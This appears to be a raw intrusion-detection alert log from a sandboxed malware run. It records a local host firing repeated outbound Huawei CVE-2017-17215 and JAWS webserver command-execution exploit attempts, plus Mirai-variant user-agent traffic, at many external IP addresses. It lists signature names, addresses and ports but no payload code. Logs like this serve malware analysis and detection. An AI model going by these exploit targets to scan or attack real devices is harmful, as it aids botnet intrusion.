                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334978105.236.16.25137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342028112.232.87.1485501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342028112.232.87.1485501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339158160.184.226.2737215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345494123.176.138.2385501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345494123.176.138.2385501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234772249.145.68.535501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234772249.145.68.535501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341186206.12.208.855501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341186206.12.208.855501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348240102.132.199.8937215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233369825.7.47.165501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233369825.7.47.165501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351750223.10.194.10837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337608160.89.221.2245501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337608160.89.221.2245501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344008107.90.127.405501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344008107.90.127.405501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360550160.246.4.16137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344760175.225.65.1865501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344760175.225.65.1865501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348740197.226.178.17537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335958186.98.112.21037215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343236197.201.132.10237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338712223.213.44.6537215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334598105.174.239.21137215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360646155.197.169.2275501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360646155.197.169.2275501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338494156.194.23.2637215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359804212.45.245.2115501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359804212.45.245.2115501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235797414.209.12.1595501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235797414.209.12.1595501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235864843.49.66.1255501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235864843.49.66.1255501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337566156.124.202.11837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343588156.30.235.7237215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344008186.144.250.16837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357162186.83.252.3237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349238179.207.247.1365501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349238179.207.247.1365501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339496192.193.49.125501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339496192.193.49.125501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2334586105.170.5.15737215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347758105.223.181.2837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359264186.96.201.21837215TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343404105.58.115.16837215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235036076.238.253.2055501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235036076.238.253.2055501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358816190.122.104.11537215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233796477.33.12.75501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233796477.33.12.75501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235615841.7.189.13237215TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353040109.93.44.245501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353040109.93.44.245501TCP
                                              2024-12-13T01:14:16.659855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342934162.93.195.2035501TCP
                                              2024-12-13T01:14:16.659855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342934162.93.195.2035501TCP
                                              2024-12-13T01:14:16.659855+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337388223.189.197.12537215TCP
                                              2024-12-13T01:14:35.239740+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338280186.209.25.14337215TCP
                                              2024-12-13T01:14:36.863717+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234874074.79.136.1265501TCP
                                              2024-12-13T01:14:36.863717+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234874074.79.136.1265501TCP
                                              2024-12-13T01:14:36.931877+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355892186.64.108.10937215TCP
                                              2024-12-13T01:14:37.017402+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336000186.154.12.20537215TCP
                                              2024-12-13T01:14:37.078046+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347132186.117.148.22137215TCP
                                              2024-12-13T01:14:37.131220+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359578186.195.136.14837215TCP
                                              2024-12-13T01:14:38.242102+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340520186.91.208.9437215TCP
                                              2024-12-13T01:14:38.525989+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348624190.96.95.3637215TCP
                                              2024-12-13T01:14:43.419702+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233345459.25.232.265501TCP
                                              2024-12-13T01:14:43.419702+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233345459.25.232.265501TCP
                                              2024-12-13T01:14:45.228700+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338418177.8.183.1235501TCP
                                              2024-12-13T01:14:45.228700+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338418177.8.183.1235501TCP
                                              2024-12-13T01:14:53.539335+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346666186.161.109.5137215TCP
                                              2024-12-13T01:14:53.555988+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236031450.55.226.295501TCP
                                              2024-12-13T01:14:53.555988+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236031450.55.226.295501TCP
                                              2024-12-13T01:14:53.601334+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348136186.12.149.10237215TCP
                                              2024-12-13T01:14:53.601528+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2338338186.75.149.23237215TCP
                                              2024-12-13T01:14:53.601613+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23328081.126.195.35501TCP
                                              2024-12-13T01:14:53.601613+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23328081.126.195.35501TCP
                                              2024-12-13T01:14:53.602107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346448164.221.55.415501TCP
                                              2024-12-13T01:14:53.602107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346448164.221.55.415501TCP
                                              2024-12-13T01:14:53.602355+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349342186.119.176.23537215TCP
                                              2024-12-13T01:14:53.633005+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357120186.174.180.20137215TCP
                                              2024-12-13T01:14:53.647741+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339580186.201.188.5637215TCP
                                              2024-12-13T01:14:53.648716+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23457842.164.206.955501TCP
                                              2024-12-13T01:14:53.648716+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23457842.164.206.955501TCP
                                              2024-12-13T01:14:53.649438+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338040157.228.112.1075501TCP
                                              2024-12-13T01:14:53.649438+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338040157.228.112.1075501TCP
                                              2024-12-13T01:14:53.649503+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2358566186.136.135.9537215TCP
                                              2024-12-13T01:14:53.663595+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355524194.41.1.2275501TCP
                                              2024-12-13T01:14:53.663595+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355524194.41.1.2275501TCP
                                              2024-12-13T01:14:53.679004+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340120186.62.64.16737215TCP
                                              2024-12-13T01:14:53.679339+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359604123.35.134.2365501TCP
                                              2024-12-13T01:14:53.679339+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359604123.35.134.2365501TCP
                                              2024-12-13T01:14:53.679439+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342096186.234.55.17037215TCP
                                              2024-12-13T01:14:53.725781+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360018186.166.117.3837215TCP
                                              2024-12-13T01:14:53.725875+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348088186.156.72.25537215TCP
                                              2024-12-13T01:14:53.741157+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2333178186.73.174.037215TCP
                                              2024-12-13T01:14:53.741548+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352750177.164.240.1755501TCP
                                              2024-12-13T01:14:53.741548+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352750177.164.240.1755501TCP
                                              2024-12-13T01:14:53.741561+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345290151.70.178.1075501TCP
                                              2024-12-13T01:14:53.741561+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345290151.70.178.1075501TCP
                                              2024-12-13T01:14:53.741656+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233571250.207.33.625501TCP
                                              2024-12-13T01:14:53.741656+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233571250.207.33.625501TCP
                                              2024-12-13T01:14:53.772382+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23387209.215.48.1485501TCP
                                              2024-12-13T01:14:53.772382+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23387209.215.48.1485501TCP
                                              2024-12-13T01:14:53.788062+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357684186.204.170.18837215TCP
                                              2024-12-13T01:14:53.788135+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341784153.202.14.1895501TCP
                                              2024-12-13T01:14:53.788135+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341784153.202.14.1895501TCP
                                              2024-12-13T01:14:53.803582+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235278298.207.167.2425501TCP
                                              2024-12-13T01:14:53.803582+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235278298.207.167.2425501TCP
                                              2024-12-13T01:14:53.819173+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2336922186.170.41.17437215TCP
                                              2024-12-13T01:14:53.819503+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2349216186.86.173.18337215TCP
                                              2024-12-13T01:14:53.850772+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353652186.121.138.10437215TCP
                                              2024-12-13T01:14:54.038108+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2355416186.24.127.937215TCP
                                              2024-12-13T01:14:54.053644+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2360928186.223.255.18537215TCP
                                              2024-12-13T01:14:54.053780+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344446186.57.199.23637215TCP
                                              2024-12-13T01:14:54.100698+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337314186.123.254.12937215TCP
                                              2024-12-13T01:14:54.100848+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2359834186.118.218.16737215TCP
                                              2024-12-13T01:14:54.147309+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356098186.46.190.17637215TCP
                                              2024-12-13T01:14:54.554375+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344568186.9.106.11437215TCP
                                              2024-12-13T01:14:54.587369+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335366186.108.208.25537215TCP
                                              2024-12-13T01:14:54.587369+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233294431.117.171.2165501TCP
                                              2024-12-13T01:14:54.587369+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233294431.117.171.2165501TCP
                                              2024-12-13T01:14:54.587415+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343788186.120.100.13337215TCP
                                              2024-12-13T01:14:54.587610+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2351570186.150.234.23637215TCP
                                              2024-12-13T01:14:54.694487+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234215424.85.72.915501TCP
                                              2024-12-13T01:14:54.694487+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234215424.85.72.915501TCP
                                              2024-12-13T01:14:54.710302+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333460209.27.77.1985501TCP
                                              2024-12-13T01:14:54.710302+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333460209.27.77.1985501TCP
                                              2024-12-13T01:14:54.725672+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356644186.145.220.9837215TCP
                                              2024-12-13T01:14:54.725740+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349328199.115.194.715501TCP
                                              2024-12-13T01:14:54.725740+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349328199.115.194.715501TCP
                                              2024-12-13T01:14:54.741077+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353768186.101.133.17337215TCP
                                              2024-12-13T01:14:54.772258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354544142.54.51.635501TCP
                                              2024-12-13T01:14:54.772258+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354544142.54.51.635501TCP
                                              2024-12-13T01:14:54.772382+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353136186.242.228.3937215TCP
                                              2024-12-13T01:14:54.788058+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234447862.185.66.1345501TCP
                                              2024-12-13T01:14:54.788058+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234447862.185.66.1345501TCP
                                              2024-12-13T01:14:54.804036+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342374186.110.190.11537215TCP
                                              2024-12-13T01:14:54.804092+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2346362186.7.234.12637215TCP
                                              2024-12-13T01:14:54.835001+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356394207.57.102.655501TCP
                                              2024-12-13T01:14:54.835001+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356394207.57.102.655501TCP
                                              2024-12-13T01:14:54.852942+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236098247.204.4.1005501TCP
                                              2024-12-13T01:14:54.852942+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236098247.204.4.1005501TCP
                                              2024-12-13T01:14:56.022578+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337782134.45.14.175501TCP
                                              2024-12-13T01:14:56.022578+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337782134.45.14.175501TCP
                                              2024-12-13T01:14:56.022794+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354136173.228.139.1005501TCP
                                              2024-12-13T01:14:56.022794+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354136173.228.139.1005501TCP
                                              2024-12-13T01:14:56.053711+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234561682.98.84.2035501TCP
                                              2024-12-13T01:14:56.053711+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234561682.98.84.2035501TCP
                                              2024-12-13T01:14:56.678809+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2337604186.121.193.24637215TCP
                                              2024-12-13T01:14:56.679048+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355362216.237.84.1865501TCP
                                              2024-12-13T01:14:56.679048+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355362216.237.84.1865501TCP
                                              2024-12-13T01:14:56.694462+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357754186.96.143.6637215TCP
                                              2024-12-13T01:14:56.694479+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2343248186.40.157.537215TCP
                                              2024-12-13T01:14:56.694487+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333708196.180.203.2365501TCP
                                              2024-12-13T01:14:56.694487+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333708196.180.203.2365501TCP
                                              2024-12-13T01:14:56.710009+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345712186.73.163.3737215TCP
                                              2024-12-13T01:14:56.710029+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344720186.212.3.15037215TCP
                                              2024-12-13T01:14:56.710107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235931217.178.232.1785501TCP
                                              2024-12-13T01:14:56.710107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235931217.178.232.1785501TCP
                                              2024-12-13T01:14:56.725402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343866178.117.42.1615501TCP
                                              2024-12-13T01:14:56.725402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343866178.117.42.1615501TCP
                                              2024-12-13T01:14:56.726928+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2347420186.205.153.17037215TCP
                                              2024-12-13T01:14:56.727442+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345146186.53.187.13837215TCP
                                              2024-12-13T01:14:56.727613+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235301281.165.137.1915501TCP
                                              2024-12-13T01:14:56.727613+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235301281.165.137.1915501TCP
                                              2024-12-13T01:14:56.727733+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2340130186.115.226.16437215TCP
                                              2024-12-13T01:14:56.728666+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2335604186.43.48.4037215TCP
                                              2024-12-13T01:14:56.728732+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2345010186.55.175.19337215TCP
                                              2024-12-13T01:14:56.728995+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235448488.166.49.565501TCP
                                              2024-12-13T01:14:56.728995+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235448488.166.49.565501TCP
                                              2024-12-13T01:14:56.729206+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356300186.133.58.16337215TCP
                                              2024-12-13T01:14:56.729823+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347994109.101.110.2235501TCP
                                              2024-12-13T01:14:56.729823+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2347994109.101.110.2235501TCP
                                              2024-12-13T01:14:56.730271+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2341490186.64.138.24137215TCP
                                              2024-12-13T01:14:56.730798+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233474054.4.21.2345501TCP
                                              2024-12-13T01:14:56.730798+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233474054.4.21.2345501TCP
                                              2024-12-13T01:14:56.731120+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342788123.163.60.1615501TCP
                                              2024-12-13T01:14:56.731120+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342788123.163.60.1615501TCP
                                              2024-12-13T01:14:56.731283+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359534110.94.35.1105501TCP
                                              2024-12-13T01:14:56.731283+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359534110.94.35.1105501TCP
                                              2024-12-13T01:14:56.731771+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345232182.218.221.1435501TCP
                                              2024-12-13T01:14:56.731771+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345232182.218.221.1435501TCP
                                              2024-12-13T01:14:56.741001+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235446276.157.108.1745501TCP
                                              2024-12-13T01:14:56.741001+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235446276.157.108.1745501TCP
                                              2024-12-13T01:14:56.757442+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340106122.124.172.165501TCP
                                              2024-12-13T01:14:56.757442+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340106122.124.172.165501TCP
                                              2024-12-13T01:14:56.757533+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338670106.47.50.2155501TCP
                                              2024-12-13T01:14:56.757533+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338670106.47.50.2155501TCP
                                              2024-12-13T01:14:56.757566+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333810211.84.231.875501TCP
                                              2024-12-13T01:14:56.757566+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333810211.84.231.875501TCP
                                              2024-12-13T01:14:56.772221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359170102.158.0.2185501TCP
